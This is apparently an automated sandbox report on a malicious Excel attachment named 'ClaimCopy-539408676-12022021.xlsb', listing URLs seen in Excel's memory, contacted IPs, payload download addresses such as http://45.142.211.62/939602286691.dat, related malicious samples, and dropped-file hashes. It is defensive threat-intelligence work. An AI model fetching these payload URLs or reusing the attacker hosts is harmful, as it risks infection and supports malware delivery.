https://login.windows.net/common/oauth2/authorizeQ	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
https://clients.config.office.net/user/v1.0/android/policies	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeR	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeU	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://entitlement.diagnostics.office.com	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeV	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
https://www.odwebp.svc.msOneDriveClientDownloadSitehttps://onedrive.live.com/about/download/?windows	EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net/common/oauth2/authorizeH	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://tasks.office.comsD	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net/common/oauth2/authorizeJ	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://outlook.office.com/	EXCEL.EXE, 00000000.00000002.965714297.0000000013354000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957360365.0000000013354000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeK	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://storage.live.com/clientlogs/uploadlocation	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
http://45.142.211.62/939602286691.dat%9	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net/common/oauth2/authorizevfv	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeO	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.microsoftonline.com	EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeD	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://substrate.office.com/search/api/v1/SearchHistory	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeE	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeF	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
http://185.82.126.78/939602286691.dat78	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net/common/oauth2/authorizeG	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorize8	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorize9	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorize:	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
http://purl.oclc.org/ooxml/drawingml/tablea	EXCEL.EXE, 00000000.00000002.962236753.000000000DDBF000.00000004.00000001.sdmp	false		high
https://sr.outlook.office.net/ws/speech/recognize/assistant/workb	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorize=	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorize?	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorize3	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://graph.windows.net/	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://devnull.onenote.com	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://login.windows.net/common/oauth2/authorize(	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizenh	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://messaging.office.com/	EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://login.windows.net/common/oauth2/authorize)	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.142.211.62	unknown	Russian Federation	208861	RACKTECHRU	false
158.69.133.78	unknown	Canada	16276	OVHFR	false
185.82.126.78	unknown	Latvia	52173	MAKONIXLV	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532685
Start date:	02.12.2021
Start time:	16:17:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 58s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	ClaimCopy-539408676-12022021.xlsb
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.expl.evad.winXLSB@13/6@0/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.109.88.177, 52.109.76.34, 52.109.8.25, 204.79.197.222 Excluded domains from analysis (whitelisted): fp.msedge.net, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, a-0019.standard.a-msedge.net, nexus.officeapps.live.com, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net Execution Graph export aborted for target EXCEL.EXE, PID 6996 because there are no executed function

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.142.211.62	ClaimCopy-539408676-12022021.xlsb	Get hash	malicious	Browse
158.69.133.78	ClaimCopy-539408676-12022021.xlsb	Get hash	malicious	Browse	158.69.133.78/533792932717.dat2
185.82.126.78	ClaimCopy-539408676-12022021.xlsb	Get hash	malicious	Browse	185.82.126.78/533792932717.dat2

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RACKTECHRU	ClaimCopy-539408676-12022021.xlsb	Get hash	malicious	Browse	45.142.211.62
	CNSL-1741057625-Nov-22.xlsb	Get hash	malicious	Browse	45.142.211.22
	CNSL-1741057625-Nov-22.xlsb	Get hash	malicious	Browse	45.142.211.22
	8Jem3WHfr1.exe	Get hash	malicious	Browse	193.38.235.234
	Static.exe	Get hash	malicious	Browse	193.38.235.15
	aFxrnP3GU4	Get hash	malicious	Browse	91.223.144.104
	mirai.arm	Get hash	malicious	Browse	95.181.163.105
	W1Mjz5NWWl	Get hash	malicious	Browse	91.223.144.109
	qQKiWkenaq.exe	Get hash	malicious	Browse	185.156.177.75
	VKtCIrdZz3.exe	Get hash	malicious	Browse	185.156.177.75
	9lzoAGDhiF.exe	Get hash	malicious	Browse	185.156.177.75
	jgkOeJEe1J.exe	Get hash	malicious	Browse	185.156.177.75
	2xwePIrz6Y.exe	Get hash	malicious	Browse	185.156.177.75
	I6l48v5NQD	Get hash	malicious	Browse	193.38.234.19
	Nzt41q6zTL.exe	Get hash	malicious	Browse	95.181.163.15
	setup_x86_x64_install.exe	Get hash	malicious	Browse	95.181.163.181
	c2nfo64gHQ.exe	Get hash	malicious	Browse	95.181.163.181
	1dGGOE2V73.exe	Get hash	malicious	Browse	95.181.163.181
	1dGGOE2V73.exe	Get hash	malicious	Browse	95.181.163.181
	zfl3hUTQWN.exe	Get hash	malicious	Browse	95.181.163.181
OVHFR	ClaimCopy-539408676-12022021.xlsb	Get hash	malicious	Browse	158.69.133.78
	reg.exe	Get hash	malicious	Browse	213.186.33.5
	REQUEST FOR SPECIFICATION.exe	Get hash	malicious	Browse	213.251.158.218
	ETgVKIYRW5.dll	Get hash	malicious	Browse	149.56.106.83
	cMVyW1SDZz.dll	Get hash	malicious	Browse	149.56.106.83
	ETgVKIYRW5.dll	Get hash	malicious	Browse	149.56.106.83
	cMVyW1SDZz.dll	Get hash	malicious	Browse	149.56.106.83
	2iJBYBel22.dll	Get hash	malicious	Browse	149.56.106.83
	2iJBYBel22.dll	Get hash	malicious	Browse	149.56.106.83
	Tender SN980018277 & SN9901827 Signed Copy.exe	Get hash	malicious	Browse	51.161.104.181
	Invoice.exe	Get hash	malicious	Browse	54.38.220.85
	AegEywmjUJ.exe	Get hash	malicious	Browse	51.79.99.124
	P.O SPECIFICATION.xlsx	Get hash	malicious	Browse	51.79.99.124
	DC-330NC.xlsx	Get hash	malicious	Browse	51.79.99.124
	FILE_915494026923219.xlsm	Get hash	malicious	Browse	158.69.222.101
	UioA2E9DBG.dll	Get hash	malicious	Browse	158.69.222.101
	UioA2E9DBG.dll	Get hash	malicious	Browse	158.69.222.101
	916Q89rlYD.dll	Get hash	malicious	Browse	158.69.222.101
	9izNuvE61W.dll	Get hash	malicious	Browse	158.69.222.101
	P5LROPCURK.dll	Get hash	malicious	Browse	158.69.222.101

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	140193
Entropy (8bit):	5.357946767911075
Encrypted:	false
SSDEEP:	1536:AcQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:MuQ9DQW+zYXfH
MD5:	1B6629990B3BAD53A8870F8DFD998DB1
SHA1:	472C589F3EF83CED68FD4C589B79A9317A7B2395
SHA-256:	4FC908013A446B7975A50198448289300261BF39AC2925620EB1E5A39763CC27
SHA-512:	C1A0D2E958FB05E136091421662C79A21901DEBE68FB5ED29855CEADB14A97667A8DA71E2AB448F95112FAE9411B96A24C3FFB26BDE38AA36EC5189AE47D08AA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T15:18:13">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FE01959F.jpg Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1098x988, frames 3
Category:	dropped
Size (bytes):	85681
Entropy (8bit):	7.915850776614707
Encrypted:	false
SSDEEP:	1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit
MD5:	4F100E2CEFED046B44EC799015B454EF
SHA1:	5149E5D1B5212C77B3548914E9B47D67B4BEA574
SHA-256:	D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C
SHA-512:	153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF...........................................'......'#" "#>1++1>H<9<HWNNWmhm................................'......'#" "#>1++1>H<9<HWNNWmhm...........J..".................................................".............................................................q.[..+...*...K.... ..............?.......g....6..)....=~....................w5...........7_.-.......k.../...;.........!.z%o..w!....,.............?...Gs?.].......C..P~i.._.=..`....{...w....."..-........:..d.....................;z7)...~g........C....v..\..O.....0...v........v... ............A...;.~Y.}.....MsC.~..5..?.;.........V7....G...b..~...........@................O.}...o4.s_...z78.1.yl...X~.u..~..S....J..V~S..x.u~.. ..............@....u..m....rGrf.P.._+Z..?AW..~..u.G....................o&..................................................................9.0...H.Zx...M.y.[kW..o......;.....z......}v.m..[R.i....R..m....+.J............r6.P....\|s..].vO._.}..K.]-V.U=9}........W......3.....G.t}Y

C:\Users\user\Desktop\14C50000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	99460
Entropy (8bit):	7.830572977398632
Encrypted:	false
SSDEEP:	1536:IeQB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUnPGjQ:Ievc6EehCfCZpUHKGXbBKsiiGOM
MD5:	FD7A189D988925BDF5784D890500A582
SHA1:	8E51A1054D8BD145B8AF98AB593D086AA6DD4727
SHA-256:	AB95C6A9AA4778FF2449AB5C353F5DEB3C5C9D307972957F88A87FABB8BE5846
SHA-512:	24CBAF19F4335CD63162843C2D87F0653D647D853A41ACCE966606FA35B7F302A0559D5C516445F51F05C0021C455E966E51CEA1229DFD25BE27B8AE4BBFBFD5
Malicious:	false
Preview:	PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^\|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...

C:\Users\user\Desktop\14C50000:Zone.Identifier Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\ClaimCopy-539408676-12022021.xlsb (copy) Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	99460
